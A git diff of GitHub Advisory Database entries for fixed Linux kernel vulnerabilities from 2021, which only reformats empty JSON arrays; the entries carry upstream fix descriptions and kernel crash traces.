111.622242] Buffer I/O error on dev sda1, logical block 60040711, async page read\n[ 111.626927] x1 : ffff8000118cb880 x0 : ffff00017f384888\n[ 111.626938] Call trace:\n[ 111.626942] queued_spin_lock_slowpath+0x1a0/0x390\n[ 111.795809] kthread_queue_work+0x30/0xc0\n[ 111.799828] state_machine_timer_handler+0x20/0x30\n[ 111.804624] __hrtimer_run_queues+0x140/0x1e0\n[ 111.808990] hrtimer_interrupt+0xec/0x2c0\n[ 111.813004] arch_timer_handler_phys+0x38/0x50\n[ 111.817456] handle_percpu_devid_irq+0x88/0x150\n[ 111.821991] __handle_domain_irq+0x80/0xe0\n[ 111.826093] gic_handle_irq+0xc0/0x140\n[ 111.829848] el1_irq+0xbc/0x154\n[ 111.832991] arch_cpu_idle+0x1c/0x2c\n[ 111.836572] default_idle_call+0x24/0x6c\n[ 111.840497] do_idle+0x238/0x2ac\n[ 1\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-8q2m-46mc-pjw4/GHSA-8q2m-46mc-pjw4.json b/advisories/unreviewed/2024/05/GHSA-8q2m-46mc-pjw4/GHSA-8q2m-46mc-pjw4.json index 4f644755cf8..eefd020d0bc 100644 --- a/advisories/unreviewed/2024/05/GHSA-8q2m-46mc-pjw4/GHSA-8q2m-46mc-pjw4.json +++ b/advisories/unreviewed/2024/05/GHSA-8q2m-46mc-pjw4/GHSA-8q2m-46mc-pjw4.json @@ -7,12 +7,8 @@ "CVE-2021-47223" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix vlan tunnel dst null pointer dereference\n\nThis patch fixes a tunnel_dst null pointer dereference due to lockless\naccess in the tunnel egress path. When deleting a vlan tunnel the\ntunnel_dst pointer is set to NULL without waiting a grace period (i.e.\nwhile it's still usable) and packets egressing are dereferencing it\nwithout checking. Use READ/WRITE_ONCE to annotate the lockless use of\ntunnel_id, use RCU for accessing tunnel_dst and make sure it is read\nonly once and checked in the egress path. The dst is already properly RCU\nprotected so we don't need to do anything fancy than to make sure\ntunnel_id and tunnel_dst are read only once and checked in the egress path.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-8x7q-xp33-2vvh/GHSA-8x7q-xp33-2vvh.json b/advisories/unreviewed/2024/05/GHSA-8x7q-xp33-2vvh/GHSA-8x7q-xp33-2vvh.json index bf74467f07d..2a5e1c91273 100644 --- a/advisories/unreviewed/2024/05/GHSA-8x7q-xp33-2vvh/GHSA-8x7q-xp33-2vvh.json +++ b/advisories/unreviewed/2024/05/GHSA-8x7q-xp33-2vvh/GHSA-8x7q-xp33-2vvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-9h2q-cwg7-7wx8/GHSA-9h2q-cwg7-7wx8.json b/advisories/unreviewed/2024/05/GHSA-9h2q-cwg7-7wx8/GHSA-9h2q-cwg7-7wx8.json index ac943e49c3f..299c7d8b1c9 100644 --- a/advisories/unreviewed/2024/05/GHSA-9h2q-cwg7-7wx8/GHSA-9h2q-cwg7-7wx8.json +++ b/advisories/unreviewed/2024/05/GHSA-9h2q-cwg7-7wx8/GHSA-9h2q-cwg7-7wx8.json @@ -7,12 +7,8 @@ "CVE-2021-47301" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nigb: Fix use-after-free error during reset\n\nCleans the next descriptor to watch (next_to_watch) when cleaning the\nTX ring.\n\nFailure to do so can cause invalid memory accesses. If igb_poll() runs\nwhile the controller is reset this can lead to the driver try to free\na skb that was already freed.\n\n(The crash is harder to reproduce with the igb driver, but the same\npotential problem exists as the code is identical to igc)", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-9rr2-xw5v-w787/GHSA-9rr2-xw5v-w787.json b/advisories/unreviewed/2024/05/GHSA-9rr2-xw5v-w787/GHSA-9rr2-xw5v-w787.json index eb224e7afcc..39153ac4623 100644 --- a/advisories/unreviewed/2024/05/GHSA-9rr2-xw5v-w787/GHSA-9rr2-xw5v-w787.json +++ b/advisories/unreviewed/2024/05/GHSA-9rr2-xw5v-w787/GHSA-9rr2-xw5v-w787.json @@ -7,12 +7,8 @@ "CVE-2021-47359" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: Fix soft lockup during fsstress\n\nBelow traces are observed during fsstress and system got hung.\n[ 130.698396] watchdog: BUG: soft lockup - CPU#6 stuck for 26s!", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-c227-q7j7-xf88/GHSA-c227-q7j7-xf88.json b/advisories/unreviewed/2024/05/GHSA-c227-q7j7-xf88/GHSA-c227-q7j7-xf88.json index c6f18b561a3..ff8c56bdf16 100644 --- a/advisories/unreviewed/2024/05/GHSA-c227-q7j7-xf88/GHSA-c227-q7j7-xf88.json +++ b/advisories/unreviewed/2024/05/GHSA-c227-q7j7-xf88/GHSA-c227-q7j7-xf88.json @@ -7,12 +7,8 @@ "CVE-2021-47401" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nipack: ipoctal: fix stack information leak\n\nThe tty driver name is used also after registering the driver and must\nspecifically not be allocated on the stack to avoid leaking information\nto user space (or triggering an oops).\n\nDrivers should not try to encode topology information in the tty device\nname but this one snuck in through staging without anyone noticing and\nanother driver has since copied this malpractice.\n\nFixing the ABI is a separate issue, but this at least plugs the security\nhole.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-c655-qwvw-wfqm/GHSA-c655-qwvw-wfqm.json b/advisories/unreviewed/2024/05/GHSA-c655-qwvw-wfqm/GHSA-c655-qwvw-wfqm.json index 200c956876d..593ab1988fa 100644 --- a/advisories/unreviewed/2024/05/GHSA-c655-qwvw-wfqm/GHSA-c655-qwvw-wfqm.json +++ b/advisories/unreviewed/2024/05/GHSA-c655-qwvw-wfqm/GHSA-c655-qwvw-wfqm.json @@ -7,12 +7,8 @@ "CVE-2021-47246" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix page reclaim for dead peer hairpin\n\nWhen adding a hairpin flow, a firmware-side send queue is created for\nthe peer net device, which claims some host memory pages for its\ninternal ring buffer. If the peer net device is removed/unbound before\nthe hairpin flow is deleted, then the send queue is not destroyed which\nleads to a stack trace on pci device remove:\n\n[ 748.005230] mlx5_core 0000:08:00.2: wait_func:1094:(pid 12985): MANAGE_PAGES(0x108) timeout. Will cause a leak of a command resource\n[ 748.005231] mlx5_core 0000:08:00.2: reclaim_pages:514:(pid 12985): failed reclaiming pages: err -110\n[ 748.001835] mlx5_core 0000:08:00.2: mlx5_reclaim_root_pages:653:(pid 12985): failed reclaiming pages (-110) for func id 0x0\n[ 748.002171] ------------[ cut here ]------------\n[ 748.001177] FW pages counter is 4 after reclaiming all pages\n[ 748.001186] WARNING: CPU: 1 PID: 12985 at drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c:685 mlx5_reclaim_startup_pages+0x34b/0x460 [mlx5_core] [ +0.002771] Modules linked in: cls_flower mlx5_ib mlx5_core ptp pps_core act_mirred sch_ingress openvswitch nsh xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 br_netfilter rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi rdma_cm ib_umad ib_ipoib iw_cm ib_cm ib_uverbs ib_core overlay fuse [last unloaded: pps_core]\n[ 748.007225] CPU: 1 PID: 12985 Comm: tee Not tainted 5.12.0+ #1\n[ 748.001376] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n[ 748.002315] RIP: 0010:mlx5_reclaim_startup_pages+0x34b/0x460 [mlx5_core]\n[ 748.001679] Code: 28 00 00 00 0f 85 22 01 00 00 48 81 c4 b0 00 00 00 31 c0 5b 5d 41 5c 41 5d 41 5e 41 5f c3 48 c7 c7 40 cc 19 a1 e8 9f 71 0e e2 <0f> 0b e9 30 ff ff ff 48 c7 c7 a0 cc 19 a1 e8 8c 71 0e e2 0f 0b e9\n[ 748.003781] RSP: 0018:ffff88815220faf8 EFLAGS: 00010286\n[ 748.001149] RAX: 0000000000000000 RBX: ffff8881b4900280 RCX: 0000000000000000\n[ 748.001445] RDX: 0000000000000027 RSI: 0000000000000004 RDI: ffffed102a441f51\n[ 748.001614] RBP: 00000000000032b9 R08: 0000000000000001 R09: ffffed1054a15ee8\n[ 748.001446] R10: ffff8882a50af73b R11: ffffed1054a15ee7 R12: fffffbfff07c1e30\n[ 748.001447] R13: dffffc0000000000 R14: ffff8881b492cba8 R15: 0000000000000000\n[ 748.001429] FS: 00007f58bd08b580(0000) GS:ffff8882a5080000(0000) knlGS:0000000000000000\n[ 748.001695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 748.001309] CR2: 000055a026351740 CR3: 00000001d3b48006 CR4: 0000000000370ea0\n[ 748.001506] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 748.001483] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 748.001654] Call Trace:\n[ 748.000576] ? mlx5_satisfy_startup_pages+0x290/0x290 [mlx5_core]\n[ 748.001416] ? mlx5_cmd_teardown_hca+0xa2/0xd0 [mlx5_core]\n[ 748.001354] ? mlx5_cmd_init_hca+0x280/0x280 [mlx5_core]\n[ 748.001203] mlx5_function_teardown+0x30/0x60 [mlx5_core]\n[ 748.001275] mlx5_uninit_one+0xa7/0xc0 [mlx5_core]\n[ 748.001200] remove_one+0x5f/0xc0 [mlx5_core]\n[ 748.001075] pci_device_remove+0x9f/0x1d0\n[ 748.000833] device_release_driver_internal+0x1e0/0x490\n[ 748.001207] unbind_store+0x19f/0x200\n[ 748.000942] ? sysfs_file_ops+0x170/0x170\n[ 748.001000] kernfs_fop_write_iter+0x2bc/0x450\n[ 748.000970] new_sync_write+0x373/0x610\n[ 748.001124] ? new_sync_read+0x600/0x600\n[ 748.001057] ? lock_acquire+0x4d6/0x700\n[ 748.000908] ? lockdep_hardirqs_on_prepare+0x400/0x400\n[ 748.001126] ? fd_install+0x1c9/0x4d0\n[ 748.000951] vfs_write+0x4d0/0x800\n[ 748.000804] ksys_write+0xf9/0x1d0\n[ 748.000868] ? __x64_sys_read+0xb0/0xb0\n[ 748.000811] ? filp_open+0x50/0x50\n[ 748.000919] ? syscall_enter_from_user_mode+0x1d/0x50\n[ 748.001223] do_syscall_64+0x3f/0x80\n[ 748.000892] entry_SYSCALL_64_after_hwframe+0x44/0xae\n[ 748.00\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-ch44-784c-7wgq/GHSA-ch44-784c-7wgq.json b/advisories/unreviewed/2024/05/GHSA-ch44-784c-7wgq/GHSA-ch44-784c-7wgq.json index 3c61b242737..7fff78ca88f 100644 --- a/advisories/unreviewed/2024/05/GHSA-ch44-784c-7wgq/GHSA-ch44-784c-7wgq.json +++ b/advisories/unreviewed/2024/05/GHSA-ch44-784c-7wgq/GHSA-ch44-784c-7wgq.json @@ -7,12 +7,8 @@ "CVE-2021-47245" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: synproxy: Fix out of bounds when parsing TCP options\n\nThe TCP option parser in synproxy (synproxy_parse_options) could read\none byte out of bounds. When the length is 1, the execution flow gets\ninto the loop, reads one byte of the opcode, and if the opcode is\nneither TCPOPT_EOL nor TCPOPT_NOP, it reads one more byte, which exceeds\nthe length of 1.\n\nThis fix is inspired by commit 9609dad263f8 (\"ipv4: tcp_input: fix stack\nout of bounds when parsing TCP options.\").\n\nv2 changes:\n\nAdded an early return when length < 0 to avoid calling\nskb_header_pointer with negative length.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-cjw7-m4qf-xc59/GHSA-cjw7-m4qf-xc59.json b/advisories/unreviewed/2024/05/GHSA-cjw7-m4qf-xc59/GHSA-cjw7-m4qf-xc59.json index e52ffa630f1..96aa81aa38f 100644 --- a/advisories/unreviewed/2024/05/GHSA-cjw7-m4qf-xc59/GHSA-cjw7-m4qf-xc59.json +++ b/advisories/unreviewed/2024/05/GHSA-cjw7-m4qf-xc59/GHSA-cjw7-m4qf-xc59.json @@ -7,12 +7,8 @@ "CVE-2021-47227" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Prevent state corruption in __fpu__restore_sig()\n\nThe non-compacted slowpath uses __copy_from_user() and copies the entire\nuser buffer into the kernel buffer, verbatim. This means that the kernel\nbuffer may now contain entirely invalid state on which XRSTOR will #GP.\nvalidate_user_xstate_header() can detect some of that corruption, but that\nleaves the onus on callers to clear the buffer.\n\nPrior to XSAVES support, it was possible just to reinitialize the buffer,\ncompletely, but with supervisor states that is not longer possible as the\nbuffer clearing code split got it backwards. Fixing that is possible but\nnot corrupting the state in the first place is more robust.\n\nAvoid corruption of the kernel XSAVE buffer by using copy_user_to_xstate()\nwhich validates the XSAVE header contents before copying the actual states\nto the kernel. copy_user_to_xstate() was previously only called for\ncompacted-format kernel buffers, but it works for both compacted and\nnon-compacted forms.\n\nUsing it for the non-compacted form is slower because of multiple\n__copy_from_user() operations, but that cost is less important than robust\ncode in an already slow path.\n\n[ Changelog polished by Dave Hansen ]", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-cwgg-8744-62hw/GHSA-cwgg-8744-62hw.json b/advisories/unreviewed/2024/05/GHSA-cwgg-8744-62hw/GHSA-cwgg-8744-62hw.json index 75dce5c52e3..9674dee71ad 100644 --- a/advisories/unreviewed/2024/05/GHSA-cwgg-8744-62hw/GHSA-cwgg-8744-62hw.json +++ b/advisories/unreviewed/2024/05/GHSA-cwgg-8744-62hw/GHSA-cwgg-8744-62hw.json @@ -7,12 +7,8 @@ "CVE-2021-47405" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: usbhid: free raw_report buffers in usbhid_stop\n\nFree the unsent raw_report buffers when the device is removed.\n\nFixes a memory leak reported by syzbot at:\nhttps://syzkaller.appspot.com/bug?id=7b4fa7cb1a7c2d3342a2a8a6c53371c8c418ab47", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-cwj6-5v55-7mj7/GHSA-cwj6-5v55-7mj7.json b/advisories/unreviewed/2024/05/GHSA-cwj6-5v55-7mj7/GHSA-cwj6-5v55-7mj7.json index db25e9378c5..357cb59fdb8 100644 --- a/advisories/unreviewed/2024/05/GHSA-cwj6-5v55-7mj7/GHSA-cwj6-5v55-7mj7.json +++ b/advisories/unreviewed/2024/05/GHSA-cwj6-5v55-7mj7/GHSA-cwj6-5v55-7mj7.json @@ -7,12 +7,8 @@ "CVE-2021-47252" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbatman-adv: Avoid WARN_ON timing related checks\n\nThe soft/batadv interface for a queued OGM can be changed during the time\nthe OGM was queued for transmission and when the OGM is actually\ntransmitted by the worker.\n\nBut WARN_ON must be used to denote kernel bugs and not to print simple\nwarnings. A warning can simply be printed using pr_warn.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-fj34-p4r2-ghh5/GHSA-fj34-p4r2-ghh5.json b/advisories/unreviewed/2024/05/GHSA-fj34-p4r2-ghh5/GHSA-fj34-p4r2-ghh5.json index 1653f1b1212..abacad0e70d 100644 --- a/advisories/unreviewed/2024/05/GHSA-fj34-p4r2-ghh5/GHSA-fj34-p4r2-ghh5.json +++ b/advisories/unreviewed/2024/05/GHSA-fj34-p4r2-ghh5/GHSA-fj34-p4r2-ghh5.json @@ -7,12 +7,8 @@ "CVE-2021-47281" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: seq: Fix race of snd_seq_timer_open()\n\nThe timer instance per queue is exclusive, and snd_seq_timer_open()\nshould have managed the concurrent accesses. It looks as if it's\nchecking the already existing timer instance at the beginning, but\nit's not right, because there is no protection, hence any later\nconcurrent call of snd_seq_timer_open() may override the timer\ninstance easily. This may result in UAF, as the leftover timer\ninstance can keep running while the queue itself gets closed, as\nspotted by syzkaller recently.\n\nFor avoiding the race, add a proper check at the assignment of\ntmr->timeri again, and return -EBUSY if it's been already registered.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-fw4j-88v3-6hfw/GHSA-fw4j-88v3-6hfw.json b/advisories/unreviewed/2024/05/GHSA-fw4j-88v3-6hfw/GHSA-fw4j-88v3-6hfw.json index 1158bc2ea74..a4bd39bebf1 100644 --- a/advisories/unreviewed/2024/05/GHSA-fw4j-88v3-6hfw/GHSA-fw4j-88v3-6hfw.json +++ b/advisories/unreviewed/2024/05/GHSA-fw4j-88v3-6hfw/GHSA-fw4j-88v3-6hfw.json @@ -7,12 +7,8 @@ "CVE-2021-47305" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma-buf/sync_file: Don't leak fences on merge failure\n\nEach add_fence() call does a dma_fence_get() on the relevant fence. In\nthe error path, we weren't calling dma_fence_put() so all those fences\ngot leaked. Also, in the krealloc_array failure case, we weren't\nfreeing the fences array. Instead, ensure that i and fences are always\nzero-initialized and dma_fence_put() all the fences and kfree(fences) on\nevery error path.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-g2fc-vv42-p4pc/GHSA-g2fc-vv42-p4pc.json b/advisories/unreviewed/2024/05/GHSA-g2fc-vv42-p4pc/GHSA-g2fc-vv42-p4pc.json index c1dc09e90f5..c296977550a 100644 --- a/advisories/unreviewed/2024/05/GHSA-g2fc-vv42-p4pc/GHSA-g2fc-vv42-p4pc.json +++ b/advisories/unreviewed/2024/05/GHSA-g2fc-vv42-p4pc/GHSA-g2fc-vv42-p4pc.json @@ -7,12 +7,8 @@ "CVE-2021-47399" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nixgbe: Fix NULL pointer dereference in ixgbe_xdp_setup\n\nThe ixgbe driver currently generates a NULL pointer dereference with\nsome machine (online cpus < 63). This is due to the fact that the\nmaximum value of num_xdp_queues is nr_cpu_ids. Code is in\n\"ixgbe_set_rss_queues\"\".\n\nHere's how the problem repeats itself:\nSome machine (online cpus < 63), And user set num_queues to 63 through\nethtool. Code is in the \"ixgbe_set_channels\",\n\tadapter->ring_feature[RING_F_FDIR].limit = count;\n\nIt becomes 63.\n\nWhen user use xdp, \"ixgbe_set_rss_queues\" will set queues num.\n\tadapter->num_rx_queues = rss_i;\n\tadapter->num_tx_queues = rss_i;\n\tadapter->num_xdp_queues = ixgbe_xdp_queues(adapter);\n\nAnd rss_i's value is from\n\tf = &adapter->ring_feature[RING_F_FDIR];\n\trss_i = f->indices = f->limit;\n\nSo \"num_rx_queues\" > \"num_xdp_queues\", when run to \"ixgbe_xdp_setup\",\n\tfor (i = 0; i < adapter->num_rx_queues; i++)\n\t\tif (adapter->xdp_ring[i]->xsk_umem)\n\nIt leads to panic.\n\nCall trace:\n[exception RIP: ixgbe_xdp+368]\nRIP: ffffffffc02a76a0 RSP: ffff9fe16202f8d0 RFLAGS: 00010297\nRAX: 0000000000000000 RBX: 0000000000000020 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 000000000000001c RDI: ffffffffa94ead90\nRBP: ffff92f8f24c0c18 R8: 0000000000000000 R9: 0000000000000000\nR10: ffff9fe16202f830 R11: 0000000000000000 R12: ffff92f8f24c0000\nR13: ffff9fe16202fc01 R14: 000000000000000a R15: ffffffffc02a7530\nORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n 7 [ffff9fe16202f8f0] dev_xdp_install at ffffffffa89fbbcc\n 8 [ffff9fe16202f920] dev_change_xdp_fd at ffffffffa8a08808\n 9 [ffff9fe16202f960] do_setlink at ffffffffa8a20235\n10 [ffff9fe16202fa88] rtnl_setlink at ffffffffa8a20384\n11 [ffff9fe16202fc78] rtnetlink_rcv_msg at ffffffffa8a1a8dd\n12 [ffff9fe16202fcf0] netlink_rcv_skb at ffffffffa8a717eb\n13 [ffff9fe16202fd40] netlink_unicast at ffffffffa8a70f88\n14 [ffff9fe16202fd80] netlink_sendmsg at ffffffffa8a71319\n15 [ffff9fe16202fdf0] sock_sendmsg at ffffffffa89df290\n16 [ffff9fe16202fe08] __sys_sendto at ffffffffa89e19c8\n17 [ffff9fe16202ff30] __x64_sys_sendto at ffffffffa89e1a64\n18 [ffff9fe16202ff38] do_syscall_64 at ffffffffa84042b9\n19 [ffff9fe16202ff50] entry_SYSCALL_64_after_hwframe at ffffffffa8c0008c\n\nSo I fix ixgbe_max_channels so that it will not allow a setting of queues\nto be higher than the num_online_cpus(). And when run to ixgbe_xdp_setup,\ntake the smaller value of num_rx_queues and num_xdp_queues.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-g3v4-6rhh-7539/GHSA-g3v4-6rhh-7539.json b/advisories/unreviewed/2024/05/GHSA-g3v4-6rhh-7539/GHSA-g3v4-6rhh-7539.json index d4850630c25..1304f4f18a9 100644 --- a/advisories/unreviewed/2024/05/GHSA-g3v4-6rhh-7539/GHSA-g3v4-6rhh-7539.json +++ b/advisories/unreviewed/2024/05/GHSA-g3v4-6rhh-7539/GHSA-g3v4-6rhh-7539.json @@ -7,12 +7,8 @@ "CVE-2021-47254" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix use-after-free in gfs2_glock_shrink_scan\n\nThe GLF_LRU flag is checked under lru_lock in gfs2_glock_remove_from_lru() to\nremove the glock from the lru list in __gfs2_glock_put().\n\nOn the shrink scan path, the same flag is cleared under lru_lock but because\nof cond_resched_lock(&lru_lock) in gfs2_dispose_glock_lru(), progress on the\nput side can be made without deleting the glock from the lru list.\n\nKeep GLF_LRU across the race window opened by cond_resched_lock(&lru_lock) to\nensure correct behavior on both sides - clear GLF_LRU after list_del under\nlru_lock.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-g595-9cfg-4hxm/GHSA-g595-9cfg-4hxm.json b/advisories/unreviewed/2024/05/GHSA-g595-9cfg-4hxm/GHSA-g595-9cfg-4hxm.json index 6ebaf65c3c9..8034b787ab2 100644 --- a/advisories/unreviewed/2024/05/GHSA-g595-9cfg-4hxm/GHSA-g595-9cfg-4hxm.json +++ b/advisories/unreviewed/2024/05/GHSA-g595-9cfg-4hxm/GHSA-g595-9cfg-4hxm.json @@ -7,12 +7,8 @@ "CVE-2021-47302" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nigc: Fix use-after-free error during reset\n\nCleans the next descriptor to watch (next_to_watch) when cleaning the\nTX ring.\n\nFailure to do so can cause invalid memory accesses. If igc_poll() runs\nwhile the controller is being reset this can lead to the driver try to\nfree a skb that was already freed.\n\nLog message:\n\n [ 101.525242] refcount_t: underflow; use-after-free.\n [ 101.525251] WARNING: CPU: 1 PID: 646 at lib/refcount.c:28 refcount_warn_saturate+0xab/0xf0\n [ 101.525259] Modules linked in: sch_etf(E) sch_mqprio(E) rfkill(E) intel_rapl_msr(E) intel_rapl_common(E)\n x86_pkg_temp_thermal(E) intel_powerclamp(E) coretemp(E) binfmt_misc(E) kvm_intel(E) kvm(E) irqbypass(E) crc32_pclmul(E)\n ghash_clmulni_intel(E) aesni_intel(E) mei_wdt(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) snd_hda_codec_hdmi(E)\n rapl(E) intel_cstate(E) snd_hda_intel(E) snd_intel_dspcfg(E) sg(E) soundwire_intel(E) intel_uncore(E) at24(E)\n soundwire_generic_allocation(E) iTCO_wdt(E) soundwire_cadence(E) intel_pmc_bxt(E) serio_raw(E) snd_hda_codec(E)\n iTCO_vendor_support(E) watchdog(E) snd_hda_core(E) snd_hwdep(E) snd_soc_core(E) snd_compress(E) snd_pcsp(E)\n soundwire_bus(E) snd_pcm(E) evdev(E) snd_timer(E) mei_me(E) snd(E) soundcore(E) mei(E) configfs(E) ip_tables(E) x_tables(E)\n autofs4(E) ext4(E) crc32c_generic(E) crc16(E) mbcache(E) jbd2(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E)\n i915(E) ahci(E) libahci(E) ehci_pci(E) igb(E) xhci_pci(E) ehci_hcd(E)\n [ 101.525303] drm_kms_helper(E) dca(E) xhci_hcd(E) libata(E) crct10dif_pclmul(E) cec(E) crct10dif_common(E) tsn(E) igc(E)\n e1000e(E) ptp(E) i2c_i801(E) crc32c_intel(E) psmouse(E) i2c_algo_bit(E) i2c_smbus(E) scsi_mod(E) lpc_ich(E) pps_core(E)\n usbcore(E) drm(E) button(E) video(E)\n [ 101.525318] CPU: 1 PID: 646 Comm: irq/37-enp7s0-T Tainted: G E 5.10.30-rt37-tsn1-rt-ipipe #ipipe\n [ 101.525320] Hardware name: SIEMENS AG SIMATIC IPC427D/A5E31233588, BIOS V17.02.09 03/31/2017\n [ 101.525322] RIP: 0010:refcount_warn_saturate+0xab/0xf0\n [ 101.525325] Code: 05 31 48 44 01 01 e8 f0 c6 42 00 0f 0b c3 80 3d 1f 48 44 01 00 75 90 48 c7 c7 78 a8 f3 a6 c6 05 0f 48\n 44 01 01 e8 d1 c6 42 00 <0f> 0b c3 80 3d fe 47 44 01 00 0f 85 6d ff ff ff 48 c7 c7 d0 a8 f3\n [ 101.525327] RSP: 0018:ffffbdedc0917cb8 EFLAGS: 00010286\n [ 101.525329] RAX: 0000000000000000 RBX: ffff98fd6becbf40 RCX: 0000000000000001\n [ 101.525330] RDX: 0000000000000001 RSI: ffffffffa6f2700c RDI: 00000000ffffffff\n [ 101.525332] RBP: ffff98fd6becc14c R08: ffffffffa7463d00 R09: ffffbdedc0917c50\n [ 101.525333] R10: ffffffffa74c3578 R11: 0000000000000034 R12: 00000000ffffff00\n [ 101.525335] R13: ffff98fd6b0b1000 R14: 0000000000000039 R15: ffff98fd6be35c40\n [ 101.525337] FS: 0000000000000000(0000) GS:ffff98fd6e240000(0000) knlGS:0000000000000000\n [ 101.525339] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [ 101.525341] CR2: 00007f34135a3a70 CR3: 0000000150210003 CR4: 00000000001706e0\n [ 101.525343] Call Trace:\n [ 